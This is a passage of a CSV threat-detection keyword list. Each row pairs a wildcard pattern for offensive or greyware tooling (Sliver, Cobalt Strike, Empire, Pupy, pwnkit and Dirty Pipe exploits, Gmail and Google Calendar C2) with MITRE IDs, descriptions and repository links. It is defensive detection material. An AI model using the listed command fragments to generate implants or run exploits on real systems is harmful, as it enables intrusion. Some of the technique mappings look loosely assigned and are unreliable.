- T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*gather/user_hunter*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*gatherer/gatherer.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" +"*gato * attack*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*gato * enumerate*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*gato * --http-proxy*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*gato * --socks-proxy*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*gbfgfbopcfokdpkdigfmoeaajfmpkbnh*","greyware_tool_keyword","westwind","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*gbmdmipapolaohpinhblmcnpmmlgfgje*","greyware_tool_keyword","Unblock Websites","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*gc2-sheet.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"*GC2-sheet/cmd*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"*gcat*implant.py*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*gcat.is.the.shit@gmail.com*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*gcc cve_2022_0847.c -o exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" +"*gcc dirtypipez.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" +"*gci -h C:\pagefile.sys*","greyware_tool_keyword","powershell","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*gcknhkkoolaabfmlnjonogaaifnjlfnp*","greyware_tool_keyword","FoxyProxy Standard","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*gconv-modules*","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" +"*gcp_functionalc2.profile*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*GCPBucketBrute*","offensive_tool_keyword","GCPBucketBrute","A script to enumerate Google Storage buckets. determine what access you have to them. and determine if they can be privilege escalated","T1083 - T1553 - T1210 - T1213","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs/GCPBucketBrute","1","0","N/A","N/A","5","406","82","2023-05-26T19:11:42Z","2019-02-26T03:56:22Z" +"*GCR - Google Calendar RAT*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" +"*GCR-Google-Calendar-RAT*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" +"*geacon*/cmd/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*geli2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gemailhack.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*gen -f py bind --port*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*gen -f py_oneliner connect *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*genCrossC2 *","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*genCrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*genCrossC2.Win.exe*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*Generalrecon -noninteractive*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*generate beacon --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate exe Shadow*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*generate --http http*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate --mtls * --os windows *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate --mtls * --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate payload=*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*generate --tcp-pivot *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate/canaries.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate/implants.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*generate_beacon*","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" +"*generate_beanshell1*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*generate_exploit_path_from_template*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*generate_golden_saml*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*generate_hta operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*generate_jdk8u20*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*generate_loader_cmd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*generate_mozillarhino1*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*generate_mozillarhino2*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*generate_powershell operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*generate_powershell_exe*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*generate_powershell_shellcode*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*generate_python_exe*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*generate_python_shellcode*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater 